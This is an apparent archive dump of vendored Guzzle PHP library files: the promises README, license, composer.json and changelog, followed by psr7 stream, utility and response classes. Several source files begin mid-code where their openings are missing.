chain. Returning a promise in a `then` callback will cause the subsequent promises in the chain to only be fulfilled when the returned promise has been fulfilled. The next promise in the chain will be invoked with the resolved value of the promise. ```php use GuzzleHttp\Promise\Promise; $promise = new Promise(); $nextPromise = new Promise(); $promise ->then(function ($value) use ($nextPromise) { echo $value; return $nextPromise; }) ->then(function ($value) { echo $value; }); // Triggers the first callback and outputs "A" $promise->resolve('A'); // Triggers the second callback and outputs "B" $nextPromise->resolve('B'); ``` ### Promise Rejection When a promise is rejected, the `$onRejected` callbacks are invoked with the rejection reason. ```php use GuzzleHttp\Promise\Promise; $promise = new Promise(); $promise->then(null, function ($reason) { echo $reason; }); $promise->reject('Error!'); // Outputs "Error!" ``` ### Rejection Forwarding If an exception is thrown in an `$onRejected` callback, subsequent `$onRejected` callbacks are invoked with the thrown exception as the reason. ```php use GuzzleHttp\Promise\Promise; $promise = new Promise(); $promise->then(null, function ($reason) { throw new Exception($reason); })->then(null, function ($reason) { assert($reason->getMessage() === 'Error!'); }); $promise->reject('Error!'); ``` You can also forward a rejection down the promise chain by returning a `GuzzleHttp\Promise\RejectedPromise` in either an `$onFulfilled` or `$onRejected` callback. ```php use GuzzleHttp\Promise\Promise; use GuzzleHttp\Promise\RejectedPromise; $promise = new Promise(); $promise->then(null, function ($reason) { return new RejectedPromise($reason); })->then(null, function ($reason) { assert($reason === 'Error!'); }); $promise->reject('Error!'); ``` If an exception is not thrown in a `$onRejected` callback and the callback does not return a rejected promise, downstream `$onFulfilled` callbacks are invoked using the value returned from the `$onRejected` callback. ```php use GuzzleHttp\Promise\Promise; $promise = new Promise(); $promise ->then(null, function ($reason) { return "It's ok"; }) ->then(function ($value) { assert($value === "It's ok"); }); $promise->reject('Error!'); ``` ## Synchronous Wait You can synchronously force promises to complete using a promise's `wait` method. When creating a promise, you can provide a wait function that is used to synchronously force a promise to complete. When a wait function is invoked it is expected to deliver a value to the promise or reject the promise. If the wait function does not deliver a value, then an exception is thrown. The wait function provided to a promise constructor is invoked when the `wait` function of the promise is called. ```php $promise = new Promise(function () use (&$promise) { $promise->resolve('foo'); }); // Calling wait will return the value of the promise. echo $promise->wait(); // outputs "foo" ``` If an exception is encountered while invoking the wait function of a promise, the promise is rejected with the exception and the exception is thrown. ```php $promise = new Promise(function () use (&$promise) { throw new Exception('foo'); }); $promise->wait(); // throws the exception. ``` Calling `wait` on a promise that has been fulfilled will not trigger the wait function. It will simply return the previously resolved value. ```php $promise = new Promise(function () { die('this is not called!'); }); $promise->resolve('foo'); echo $promise->wait(); // outputs "foo" ``` Calling `wait` on a promise that has been rejected will throw an exception. If the rejection reason is an instance of `\Exception` the reason is thrown. Otherwise, a `GuzzleHttp\Promise\RejectionException` is thrown and the reason can be obtained by calling the `getReason` method of the exception. ```php $promise = new Promise(); $promise->reject('foo'); $promise->wait(); ``` > PHP Fatal error: Uncaught exception 'GuzzleHttp\Promise\RejectionException' with message 'The promise was rejected with value: foo' ### Unwrapping a Promise When synchronously waiting on a promise, you are joining the state of the promise into the current state of execution (i.e., return the value of the promise if it was fulfilled or throw an exception if it was rejected). This is called "unwrapping" the promise. Waiting on a promise will by default unwrap the promise state. You can force a promise to resolve and *not* unwrap the state of the promise by passing `false` to the first argument of the `wait` function: ```php $promise = new Promise(); $promise->reject('foo'); // This will not throw an exception. It simply ensures the promise has // been resolved. $promise->wait(false); ``` When unwrapping a promise, the resolved value of the promise will be waited upon until the unwrapped value is not a promise. This means that if you resolve promise A with a promise B and unwrap promise A, the value returned by the wait function will be the value delivered to promise B. **Note**: when you do not unwrap the promise, no value is returned. ## Cancellation You can cancel a promise that has not yet been fulfilled using the `cancel()` method of a promise. When creating a promise you can provide an optional cancel function that when invoked cancels the action of computing a resolution of the promise. ## API ### Promise When creating a promise object, you can provide an optional `$waitFn` and `$cancelFn`. `$waitFn` is a function that is invoked with no arguments and is expected to resolve the promise. `$cancelFn` is a function with no arguments that is expected to cancel the computation of a promise. It is invoked when the `cancel()` method of a promise is called. ```php use GuzzleHttp\Promise\Promise; $promise = new Promise( function () use (&$promise) { $promise->resolve('waited'); }, function () { // do something that will cancel the promise computation (e.g., close // a socket, cancel a database query, etc...) } ); assert('waited' === $promise->wait()); ``` A promise has the following methods: - `then(callable $onFulfilled, callable $onRejected) : PromiseInterface` Appends fulfillment and rejection handlers to the promise, and returns a new promise resolving to the return value of the called handler. - `otherwise(callable $onRejected) : PromiseInterface` Appends a rejection handler callback to the promise, and returns a new promise resolving to the return value of the callback if it is called, or to its original fulfillment value if the promise is instead fulfilled. - `wait($unwrap = true) : mixed` Synchronously waits on the promise to complete. `$unwrap` controls whether or not the value of the promise is returned for a fulfilled promise or if an exception is thrown if the promise is rejected. This is set to `true` by default. - `cancel()` Attempts to cancel the promise if possible. The promise being cancelled and the parent most ancestor that has not yet been resolved will also be cancelled. Any promises waiting on the cancelled promise to resolve will also be cancelled. - `getState() : string` Returns the state of the promise. One of `pending`, `fulfilled`, or `rejected`. - `resolve($value)` Fulfills the promise with the given `$value`. - `reject($reason)` Rejects the promise with the given `$reason`. ### FulfilledPromise A fulfilled promise can be created to represent a promise that has been fulfilled. ```php use GuzzleHttp\Promise\FulfilledPromise; $promise = new FulfilledPromise('value'); // Fulfilled callbacks are immediately invoked. $promise->then(function ($value) { echo $value; }); ``` ### RejectedPromise A rejected promise can be created to represent a promise that has been rejected. ```php use GuzzleHttp\Promise\RejectedPromise; $promise = new RejectedPromise('Error'); // Rejected callbacks are immediately invoked. $promise->then(null, function ($reason) { echo $reason; }); ``` ## Promise Interoperability This library works with foreign promises that have a `then` method. This means you can use Guzzle promises with [React promises](https://github.com/reactphp/promise) for example. When a foreign promise is returned inside of a then method callback, promise resolution will occur recursively. ```php // Create a React promise $deferred = new React\Promise\Deferred(); $reactPromise = $deferred->promise(); // Create a Guzzle promise that is fulfilled with a React promise. $guzzlePromise = new GuzzleHttp\Promise\Promise(); $guzzlePromise->then(function ($value) use ($reactPromise) { // Do something something with the value... // Return the React promise return $reactPromise; }); ``` Please note that wait and cancel chaining is no longer possible when forwarding a foreign promise. You will need to wrap a third-party promise with a Guzzle promise in order to utilize wait and cancel functions with foreign promises. ### Event Loop Integration In order to keep the stack size constant, Guzzle promises are resolved asynchronously using a task queue. When waiting on promises synchronously, the task queue will be automatically run to ensure that the blocking promise and any forwarded promises are resolved. When using promises asynchronously in an event loop, you will need to run the task queue on each tick of the loop. If you do not run the task queue, then promises will not be resolved. You can run the task queue using the `run()` method of the global task queue instance. ```php // Get the global task queue $queue = GuzzleHttp\Promise\Utils::queue(); $queue->run(); ``` For example, you could use Guzzle promises with React using a periodic timer: ```php $loop = React\EventLoop\Factory::create(); $loop->addPeriodicTimer(0, [$queue, 'run']); ``` ## Implementation Notes ### Promise Resolution and Chaining is Handled Iteratively By shuffling pending handlers from one owner to another, promises are resolved iteratively, allowing for "infinite" then chaining. ```php then(function ($v) { // The stack size remains constant (a good thing) echo xdebug_get_stack_depth() . ', '; return $v + 1; }); } $parent->resolve(0); var_dump($p->wait()); // int(1000) ``` When a promise is fulfilled or rejected with a non-promise value, the promise then takes ownership of the handlers of each child promise and delivers values down the chain without using recursion. When a promise is resolved with another promise, the original promise transfers all of its pending handlers to the new promise. When the new promise is eventually resolved, all of the pending handlers are delivered the forwarded value. ### A Promise is the Deferred Some promise libraries implement promises using a deferred object to represent a computation and a promise object to represent the delivery of the result of the computation. This is a nice separation of computation and delivery because consumers of the promise cannot modify the value that will be eventually delivered. One side effect of being able to implement promise resolution and chaining iteratively is that you need to be able for one promise to reach into the state of another promise to shuffle around ownership of handlers. In order to achieve this without making the handlers of a promise publicly mutable, a promise is also the deferred value, allowing promises of the same parent class to reach into and modify the private properties of promises of the same type. While this does allow consumers of the value to modify the resolution or rejection of the deferred, it is a small price to pay for keeping the stack size constant. ```php $promise = new Promise(); $promise->then(function ($value) { echo $value; }); // The promise is the deferred value, so you can deliver a value to it. $promise->resolve('foo'); // prints "foo" ``` ## Upgrading from Function API A static API was first introduced in 1.4.0, in order to mitigate problems with functions conflicting between global and local copies of the package. The function API was removed in 2.0.0. A migration table has been provided here for your convenience: | Original Function | Replacement Method | |----------------|----------------| | `queue` | `Utils::queue` | | `task` | `Utils::task` | | `promise_for` | `Create::promiseFor` | | `rejection_for` | `Create::rejectionFor` | | `exception_for` | `Create::exceptionFor` | | `iter_for` | `Create::iterFor` | | `inspect` | `Utils::inspect` | | `inspect_all` | `Utils::inspectAll` | | `unwrap` | `Utils::unwrap` | | `all` | `Utils::all` | | `some` | `Utils::some` | | `any` | `Utils::any` | | `settle` | `Utils::settle` | | `each` | `Each::of` | | `each_limit` | `Each::ofLimit` | | `each_limit_all` | `Each::ofLimitAll` | | `!is_fulfilled` | `Is::pending` | | `is_fulfilled` | `Is::fulfilled` | | `is_rejected` | `Is::rejected` | | `is_settled` | `Is::settled` | | `coroutine` | `Coroutine::of` | ## Security If you discover a security vulnerability within this package, please send an email to security@tidelift.com. All security vulnerabilities will be promptly addressed. Please do not disclose security-related issues publicly until a fix has been announced. Please see [Security Policy](https://github.com/guzzle/promises/security/policy) for more information. ## License Guzzle is made available under the MIT License (MIT). Please see [License File](LICENSE) for more information. ## For Enterprise Available as part of the Tidelift Subscription The maintainers of Guzzle and thousands of other packages are working with Tidelift to deliver commercial support and maintenance for the open source dependencies you use to build your applications. Save time, reduce risk, and improve code health, while paying the maintainers of the exact dependencies you use. [Learn more.](https://tidelift.com/subscription/pkg/packagist-guzzlehttp-promises?utm_source=packagist-guzzlehttp-promises&utm_medium=referral&utm_campaign=enterprise&utm_term=repo) google-api/vendor/guzzlehttp/promises/LICENSE000064400000002404147600400120015144 0ustar00The MIT License (MIT) Copyright (c) 2015 Michael Dowling Copyright (c) 2015 Graham Campbell Copyright (c) 2017 Tobias Schultze Copyright (c) 2020 Tobias Nyholm Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. google-api/vendor/guzzlehttp/promises/composer.json000064400000002725147600400120016667 0ustar00;{ "name": "guzzlehttp/promises", "description": "Guzzle promises library", "keywords": ["promise"], "license": "MIT", "authors": [ { "name": "Graham Campbell", "email": "hello@gjcampbell.co.uk", "homepage": "https://github.com/GrahamCampbell" }, { "name": "Michael Dowling", "email": "mtdowling@gmail.com", "homepage": "https://github.com/mtdowling" }, { "name": "Tobias Nyholm", "email": "tobias.nyholm@gmail.com", "homepage": "https://github.com/Nyholm" }, { "name": "Tobias Schultze", "email": "webmaster@tubo-world.de", "homepage": "https://github.com/Tobion" } ], "require": { "php": "^7.2.5 || ^8.0" }, "require-dev": { "bamarni/composer-bin-plugin": "^1.8.2", "phpunit/phpunit": "^8.5.36 || ^9.6.15" }, "autoload": { "psr-4": { "GuzzleHttp\\Promise\\": "src/" } }, "autoload-dev": { "psr-4": { "GuzzleHttp\\Promise\\Tests\\": "tests/" } }, "extra": { "bamarni-bin": { "bin-links": true, "forward-command": false } }, "config": { "allow-plugins": { "bamarni/composer-bin-plugin": true }, "preferred-install": "dist", "sort-packages": true } }google-api/vendor/guzzlehttp/promises/CHANGELOG.md000064400000004571147600400120015757 0ustar00# CHANGELOG ## 2.0.2 - 2023-12-03 ### Changed - Replaced `call_user_func*` with native calls ## 2.0.1 - 2023-08-03 ### Changed - PHP 8.3 support ## 2.0.0 - 2023-05-21 ### Added - Added PHP 7 type hints ### Changed - All previously non-final non-exception classes have been marked as soft-final ### Removed - Dropped PHP < 7.2 support - All functions in the `GuzzleHttp\Promise` namespace ## 1.5.3 - 2023-05-21 ### Changed - Removed remaining usage of deprecated functions ## 1.5.2 - 2022-08-07 ### Changed - Officially support PHP 8.2 ## 1.5.1 - 2021-10-22 ### Fixed - Revert "Call handler when waiting on fulfilled/rejected Promise" - Fix pool memory leak when empty array of promises provided ## 1.5.0 - 2021-10-07 ### Changed - Call handler when waiting on fulfilled/rejected Promise - Officially support PHP 8.1 ### Fixed - Fix manually settle promises generated with `Utils::task` ## 1.4.1 - 2021-02-18 ### Fixed - Fixed `each_limit` skipping promises and failing ## 1.4.0 - 2020-09-30 ### Added - Support for PHP 8 - Optional `$recursive` flag to `all` - Replaced functions by static methods ### Fixed - Fix empty `each` processing - Fix promise handling for Iterators of non-unique keys - Fixed `method_exists` crashes on PHP 8 - Memory leak on exceptions ## 1.3.1 - 2016-12-20 ### Fixed - `wait()` foreign promise compatibility ## 1.3.0 - 2016-11-18 ### Added - Adds support for custom task queues. ### Fixed - Fixed coroutine promise memory leak. ## 1.2.0 - 2016-05-18 ### Changed - Update to now catch `\Throwable` on PHP 7+ ## 1.1.0 - 2016-03-07 ### Changed - Update EachPromise to prevent recurring on a iterator when advancing, as this could trigger fatal generator errors. - Update Promise to allow recursive waiting without unwrapping exceptions. ## 1.0.3 - 2015-10-15 ### Changed - Update EachPromise to immediately resolve when the underlying promise iterator is empty. Previously, such a promise would throw an exception when its `wait` function was called. ## 1.0.2 - 2015-05-15 ### Changed - Conditionally require functions.php. ## 1.0.1 - 2015-06-24 ### Changed - Updating EachPromise to call next on the underlying promise iterator as late as possible to ensure that generators that generate new requests based on callbacks are not iterated until after callbacks are invoked. ## 1.0.0 - 2015-05-12 - Initial release google-api/vendor/guzzlehttp/psr7/src/Exception/MalformedUriException.php000064400000000365147600400120022700 0ustar00size = $options['size']; } $this->customMetadata = $options['metadata'] ?? []; $this->stream = $stream; $meta = stream_get_meta_data($this->stream); $this->seekable = $meta['seekable']; $this->readable = (bool) preg_match(self::READABLE_MODES, $meta['mode']); $this->writable = (bool) preg_match(self::WRITABLE_MODES, $meta['mode']); $this->uri = $this->getMetadata('uri'); } /** * Closes the stream when the destructed */ public function __destruct() { $this->close(); } public function __toString(): string { try { if ($this->isSeekable()) { $this->seek(0); } return $this->getContents(); } catch (\Throwable $e) { if (\PHP_VERSION_ID >= 70400) { throw $e; } trigger_error(sprintf('%s::__toString exception: %s', self::class, (string) $e), E_USER_ERROR); return ''; } } public function getContents(): string { if (!isset($this->stream)) { throw new \RuntimeException('Stream is detached'); } if (!$this->readable) { throw new \RuntimeException('Cannot read from non-readable stream'); } return Utils::tryGetContents($this->stream); } public function close(): void { if (isset($this->stream)) { if (is_resource($this->stream)) { fclose($this->stream); } $this->detach(); } } public function detach() { if (!isset($this->stream)) { return null; } $result = $this->stream; unset($this->stream); $this->size = $this->uri = null; $this->readable = $this->writable = $this->seekable = false; return $result; } public function getSize(): ?int { if ($this->size !== null) { return $this->size; } if (!isset($this->stream)) { return null; } // Clear the stat cache if the stream has a URI if ($this->uri) { clearstatcache(true, $this->uri); } $stats = fstat($this->stream); if (is_array($stats) && isset($stats['size'])) { $this->size = $stats['size']; return $this->size; } return null; } public function isReadable(): bool { return $this->readable; } public function isWritable(): bool { return $this->writable; } public function isSeekable(): bool { return $this->seekable; } public function eof(): bool { if (!isset($this->stream)) { throw new \RuntimeException('Stream is detached'); } return feof($this->stream); } public function tell(): int { if (!isset($this->stream)) { throw new \RuntimeException('Stream is detached'); } $result = ftell($this->stream); if ($result === false) { throw new \RuntimeException('Unable to determine stream position'); } return $result; } public function rewind(): void { $this->seek(0); } public function seek($offset, $whence = SEEK_SET): void { $whence = (int) $whence; if (!isset($this->stream)) { throw new \RuntimeException('Stream is detached'); } if (!$this->seekable) { throw new \RuntimeException('Stream is not seekable'); } if (fseek($this->stream, $offset, $whence) === -1) { throw new \RuntimeException('Unable to seek to stream position ' .$offset.' with whence '.var_export($whence, true)); } } public function read($length): string { if (!isset($this->stream)) { throw new \RuntimeException('Stream is detached'); } if (!$this->readable) { throw new \RuntimeException('Cannot read from non-readable stream'); } if ($length < 0) { throw new \RuntimeException('Length parameter cannot be negative'); } if (0 === $length) { return ''; } try { $string = fread($this->stream, $length); } catch (\Exception $e) { throw new \RuntimeException('Unable to read from stream', 0, $e); } if (false === $string) { throw new \RuntimeException('Unable to read from stream'); } return $string; } public function write($string): int { if (!isset($this->stream)) { throw new \RuntimeException('Stream is detached'); } if (!$this->writable) { throw new \RuntimeException('Cannot write to a non-writable stream'); } // We can't know the size after writing anything $this->size = null; $result = fwrite($this->stream, $string); if ($result === false) { throw new \RuntimeException('Unable to write to stream'); } return $result; } /** * @return mixed */ public function getMetadata($key = null) { if (!isset($this->stream)) { return $key ? null : []; } elseif (!$key) { return $this->customMetadata + stream_get_meta_data($this->stream); } elseif (isset($this->customMetadata[$key])) { return $this->customMetadata[$key]; } $meta = stream_get_meta_data($this->stream); return $meta[$key] ?? null; } } google-api/vendor/guzzlehttp/psr7/src/LazyOpenStream.php000064400000002100147600400120017377 0ustar00filename = $filename; $this->mode = $mode; // unsetting the property forces the first access to go through // __get(). unset($this->stream); } /** * Creates the underlying stream lazily when required. */ protected function createStream(): StreamInterface { return Utils::streamFor(Utils::tryFopen($this->filename, $this->mode)); } } google-api/vendor/guzzlehttp/psr7/src/Utils.php000064400000036324147600400120015601 0ustar00 $v) { if (!in_array(strtolower((string) $k), $keys)) { $result[$k] = $v; } } return $result; } /** * Copy the contents of a stream into another stream until the given number * of bytes have been read. * * @param StreamInterface $source Stream to read from * @param StreamInterface $dest Stream to write to * @param int $maxLen Maximum number of bytes to read. Pass -1 * to read the entire stream. * * @throws \RuntimeException on error. */ public static function copyToStream(StreamInterface $source, StreamInterface $dest, int $maxLen = -1): void { $bufferSize = 8192; if ($maxLen === -1) { while (!$source->eof()) { if (!$dest->write($source->read($bufferSize))) { break; } } } else { $remaining = $maxLen; while ($remaining > 0 && !$source->eof()) { $buf = $source->read(min($bufferSize, $remaining)); $len = strlen($buf); if (!$len) { break; } $remaining -= $len; $dest->write($buf); } } } /** * Copy the contents of a stream into a string until the given number of * bytes have been read. * * @param StreamInterface $stream Stream to read * @param int $maxLen Maximum number of bytes to read. Pass -1 * to read the entire stream. * * @throws \RuntimeException on error. */ public static function copyToString(StreamInterface $stream, int $maxLen = -1): string { $buffer = ''; if ($maxLen === -1) { while (!$stream->eof()) { $buf = $stream->read(1048576); if ($buf === '') { break; } $buffer .= $buf; } return $buffer; } $len = 0; while (!$stream->eof() && $len < $maxLen) { $buf = $stream->read($maxLen - $len); if ($buf === '') { break; } $buffer .= $buf; $len = strlen($buffer); } return $buffer; } /** * Calculate a hash of a stream. * * This method reads the entire stream to calculate a rolling hash, based * on PHP's `hash_init` functions. * * @param StreamInterface $stream Stream to calculate the hash for * @param string $algo Hash algorithm (e.g. md5, crc32, etc) * @param bool $rawOutput Whether or not to use raw output * * @throws \RuntimeException on error. */ public static function hash(StreamInterface $stream, string $algo, bool $rawOutput = false): string { $pos = $stream->tell(); if ($pos > 0) { $stream->rewind(); } $ctx = hash_init($algo); while (!$stream->eof()) { hash_update($ctx, $stream->read(1048576)); } $out = hash_final($ctx, $rawOutput); $stream->seek($pos); return $out; } /** * Clone and modify a request with the given changes. * * This method is useful for reducing the number of clones needed to mutate * a message. * * The changes can be one of: * - method: (string) Changes the HTTP method. * - set_headers: (array) Sets the given headers. * - remove_headers: (array) Remove the given headers. * - body: (mixed) Sets the given body. * - uri: (UriInterface) Set the URI. * - query: (string) Set the query string value of the URI. * - version: (string) Set the protocol version. * * @param RequestInterface $request Request to clone and modify. * @param array $changes Changes to apply. */ public static function modifyRequest(RequestInterface $request, array $changes): RequestInterface { if (!$changes) { return $request; } $headers = $request->getHeaders(); if (!isset($changes['uri'])) { $uri = $request->getUri(); } else { // Remove the host header if one is on the URI if ($host = $changes['uri']->getHost()) { $changes['set_headers']['Host'] = $host; if ($port = $changes['uri']->getPort()) { $standardPorts = ['http' => 80, 'https' => 443]; $scheme = $changes['uri']->getScheme(); if (isset($standardPorts[$scheme]) && $port != $standardPorts[$scheme]) { $changes['set_headers']['Host'] .= ':'.$port; } } } $uri = $changes['uri']; } if (!empty($changes['remove_headers'])) { $headers = self::caselessRemove($changes['remove_headers'], $headers); } if (!empty($changes['set_headers'])) { $headers = self::caselessRemove(array_keys($changes['set_headers']), $headers); $headers = $changes['set_headers'] + $headers; } if (isset($changes['query'])) { $uri = $uri->withQuery($changes['query']); } if ($request instanceof ServerRequestInterface) { $new = (new ServerRequest( $changes['method'] ?? $request->getMethod(), $uri, $headers, $changes['body'] ?? $request->getBody(), $changes['version'] ?? $request->getProtocolVersion(), $request->getServerParams() )) ->withParsedBody($request->getParsedBody()) ->withQueryParams($request->getQueryParams()) ->withCookieParams($request->getCookieParams()) ->withUploadedFiles($request->getUploadedFiles()); foreach ($request->getAttributes() as $key => $value) { $new = $new->withAttribute($key, $value); } return $new; } return new Request( $changes['method'] ?? $request->getMethod(), $uri, $headers, $changes['body'] ?? $request->getBody(), $changes['version'] ?? $request->getProtocolVersion() ); } /** * Read a line from the stream up to the maximum allowed buffer length. * * @param StreamInterface $stream Stream to read from * @param int|null $maxLength Maximum buffer length */ public static function readLine(StreamInterface $stream, int $maxLength = null): string { $buffer = ''; $size = 0; while (!$stream->eof()) { if ('' === ($byte = $stream->read(1))) { return $buffer; } $buffer .= $byte; // Break when a new line is found or the max length - 1 is reached if ($byte === "\n" || ++$size === $maxLength - 1) { break; } } return $buffer; } /** * Create a new stream based on the input type. * * Options is an associative array that can contain the following keys: * - metadata: Array of custom metadata. * - size: Size of the stream. * * This method accepts the following `$resource` types: * - `Psr\Http\Message\StreamInterface`: Returns the value as-is. * - `string`: Creates a stream object that uses the given string as the contents. * - `resource`: Creates a stream object that wraps the given PHP stream resource. * - `Iterator`: If the provided value implements `Iterator`, then a read-only * stream object will be created that wraps the given iterable. Each time the * stream is read from, data from the iterator will fill a buffer and will be * continuously called until the buffer is equal to the requested read size. * Subsequent read calls will first read from the buffer and then call `next` * on the underlying iterator until it is exhausted. * - `object` with `__toString()`: If the object has the `__toString()` method, * the object will be cast to a string and then a stream will be returned that * uses the string value. * - `NULL`: When `null` is passed, an empty stream object is returned. * - `callable` When a callable is passed, a read-only stream object will be * created that invokes the given callable. The callable is invoked with the * number of suggested bytes to read. The callable can return any number of * bytes, but MUST return `false` when there is no more data to return. The * stream object that wraps the callable will invoke the callable until the * number of requested bytes are available. Any additional bytes will be * buffered and used in subsequent reads. * * @param resource|string|int|float|bool|StreamInterface|callable|\Iterator|null $resource Entity body data * @param array{size?: int, metadata?: array} $options Additional options * * @throws \InvalidArgumentException if the $resource arg is not valid. */ public static function streamFor($resource = '', array $options = []): StreamInterface { if (is_scalar($resource)) { $stream = self::tryFopen('php://temp', 'r+'); if ($resource !== '') { fwrite($stream, (string) $resource); fseek($stream, 0); } return new Stream($stream, $options); } switch (gettype($resource)) { case 'resource': /* * The 'php://input' is a special stream with quirks and inconsistencies. * We avoid using that stream by reading it into php://temp */ /** @var resource $resource */ if ((\stream_get_meta_data($resource)['uri'] ?? '') === 'php://input') { $stream = self::tryFopen('php://temp', 'w+'); stream_copy_to_stream($resource, $stream); fseek($stream, 0); $resource = $stream; } return new Stream($resource, $options); case 'object': /** @var object $resource */ if ($resource instanceof StreamInterface) { return $resource; } elseif ($resource instanceof \Iterator) { return new PumpStream(function () use ($resource) { if (!$resource->valid()) { return false; } $result = $resource->current(); $resource->next(); return $result; }, $options); } elseif (method_exists($resource, '__toString')) { return self::streamFor((string) $resource, $options); } break; case 'NULL': return new Stream(self::tryFopen('php://temp', 'r+'), $options); } if (is_callable($resource)) { return new PumpStream($resource, $options); } throw new \InvalidArgumentException('Invalid resource type: '.gettype($resource)); } /** * Safely opens a PHP stream resource using a filename. * * When fopen fails, PHP normally raises a warning. This function adds an * error handler that checks for errors and throws an exception instead. * * @param string $filename File to open * @param string $mode Mode used to open the file * * @return resource * * @throws \RuntimeException if the file cannot be opened */ public static function tryFopen(string $filename, string $mode) { $ex = null; set_error_handler(static function (int $errno, string $errstr) use ($filename, $mode, &$ex): bool { $ex = new \RuntimeException(sprintf( 'Unable to open "%s" using mode "%s": %s', $filename, $mode, $errstr )); return true; }); try { /** @var resource $handle */ $handle = fopen($filename, $mode); } catch (\Throwable $e) { $ex = new \RuntimeException(sprintf( 'Unable to open "%s" using mode "%s": %s', $filename, $mode, $e->getMessage() ), 0, $e); } restore_error_handler(); if ($ex) { /** @var $ex \RuntimeException */ throw $ex; } return $handle; } /** * Safely gets the contents of a given stream. * * When stream_get_contents fails, PHP normally raises a warning. This * function adds an error handler that checks for errors and throws an * exception instead. * * @param resource $stream * * @throws \RuntimeException if the stream cannot be read */ public static function tryGetContents($stream): string { $ex = null; set_error_handler(static function (int $errno, string $errstr) use (&$ex): bool { $ex = new \RuntimeException(sprintf( 'Unable to read stream contents: %s', $errstr )); return true; }); try { /** @var string|false $contents */ $contents = stream_get_contents($stream); if ($contents === false) { $ex = new \RuntimeException('Unable to read stream contents'); } } catch (\Throwable $e) { $ex = new \RuntimeException(sprintf( 'Unable to read stream contents: %s', $e->getMessage() ), 0, $e); } restore_error_handler(); if ($ex) { /** @var $ex \RuntimeException */ throw $ex; } return $contents; } /** * Returns a UriInterface for the given value. * * This function accepts a string or UriInterface and returns a * UriInterface for the given value. If the value is already a * UriInterface, it is returned as-is. * * @param string|UriInterface $uri * * @throws \InvalidArgumentException */ public static function uriFor($uri): UriInterface { if ($uri instanceof UriInterface) { return $uri; } if (is_string($uri)) { return new Uri($uri); } throw new \InvalidArgumentException('URI must be a string or UriInterface'); } } google-api/vendor/guzzlehttp/psr7/src/Response.php000064400000011452147600400120016272 0ustar00 'Continue', 101 => 'Switching Protocols', 102 => 'Processing', 200 => 'OK', 201 => 'Created', 202 => 'Accepted', 203 => 'Non-Authoritative Information', 204 => 'No Content', 205 => 'Reset Content', 206 => 'Partial Content', 207 => 'Multi-status', 208 => 'Already Reported', 300 => 'Multiple Choices', 301 => 'Moved Permanently', 302 => 'Found', 303 => 'See Other', 304 => 'Not Modified', 305 => 'Use Proxy', 306 => 'Switch Proxy', 307 => 'Temporary Redirect', 308 => 'Permanent Redirect', 400 => 'Bad Request', 401 => 'Unauthorized', 402 => 'Payment Required', 403 => 'Forbidden', 404 => 'Not Found', 405 => 'Method Not Allowed', 406 => 'Not Acceptable', 407 => 'Proxy Authentication Required', 408 => 'Request Time-out', 409 => 'Conflict', 410 => 'Gone', 411 => 'Length Required', 412 => 'Precondition Failed', 413 => 'Request Entity Too Large', 414 => 'Request-URI Too Large', 415 => 'Unsupported Media Type', 416 => 'Requested range not satisfiable', 417 => 'Expectation Failed', 418 => 'I\'m a teapot', 422 => 'Unprocessable Entity', 423 => 'Locked', 424 => 'Failed Dependency', 425 => 'Unordered Collection', 426 => 'Upgrade Required', 428 => 'Precondition Required', 429 => 'Too Many Requests', 431 => 'Request Header Fields Too Large', 451 => 'Unavailable For Legal Reasons', 500 => 'Internal Server Error', 501 => 'Not Implemented', 502 => 'Bad Gateway', 503 => 'Service Unavailable', 504 => 'Gateway Time-out', 505 => 'HTTP Version not supported', 506 => 'Variant Also Negotiates', 507 => 'Insufficient Storage', 508 => 'Loop Detected', 510 => 'Not Extended', 511 => 'Network Authentication Required', ]; /** @var string */ private $reasonPhrase; /** @var int */ private $statusCode; /** * @param int $status Status code * @param (string|string[])[] $headers Response headers * @param string|resource|StreamInterface|null $body Response body * @param string $version Protocol version * @param string|null $reason Reason phrase (when empty a default will be used based on the status code) */ public function __construct( int $status = 200, array $headers = [], $body = null, string $version = '1.1', string $reason = null ) { $this->assertStatusCodeRange($status); $this->statusCode = $status; if ($body !== '' && $body !== null) { $this->stream = Utils::streamFor($body); } $this->setHeaders($headers); if ($reason == '' && isset(self::PHRASES[$this->statusCode])) { $this->reasonPhrase = self::PHRASES[$this->statusCode]; } else { $this->reasonPhrase = (string) $reason; } $this->protocol = $version; } public function getStatusCode(): int { return $this->statusCode; } public function getReasonPhrase(): string { return $this->reasonPhrase; } public function withStatus($code, $reasonPhrase = ''): ResponseInterface { $this->assertStatusCodeIsInteger($code); $code = (int) $code; $this->assertStatusCodeRange($code); $new = clone $this; $new->statusCode = $code; if ($reasonPhrase == '' && isset(self::PHRASES[$new->statusCode])) { $reasonPhrase = self::PHRASES[$new->statusCode]; } $new->reasonPhrase = (string) $reasonPhrase; return $new; } /** * @param mixed $statusCode */ private function assertStatusCodeIsInteger($statusCode): void { if (filter_var($statusCode, FILTER_VALIDATE_INT) === false) { throw new \InvalidArgumentException('Status code must be an integer value.'); } } private function assertStatusCodeRange(int $statusCode): void { if ($statusCode < 100 || $statusCode >= 600) { throw new \InvalidArgumentException('Status code must be an integer value between 1xx and 5xx.'); } } } google-api/vendor/guzzlehttp/psr7/src/Rfc7230.php000064400000001225147600400120015517 0ustar00@,;:\\\"/[\]?={}\x01-\x20\x7F]++):[ \t]*+((?:[ \t]*+[\x21-\x7E\x80-\xFF]++)*+)[ \t]*+\r?\n)m"; public const HEADER_FOLD_REGEX = "(\r?\n[ \t]++)"; } google-api/vendor/guzzlehttp/psr7/src/PumpStream.php000064400000010766147600400120016600 0ustar00source = $source; $this->size = $options['size'] ?? null; $this->metadata = $options['metadata'] ?? []; $this->buffer = new BufferStream(); } public function __toString(): string { try { return 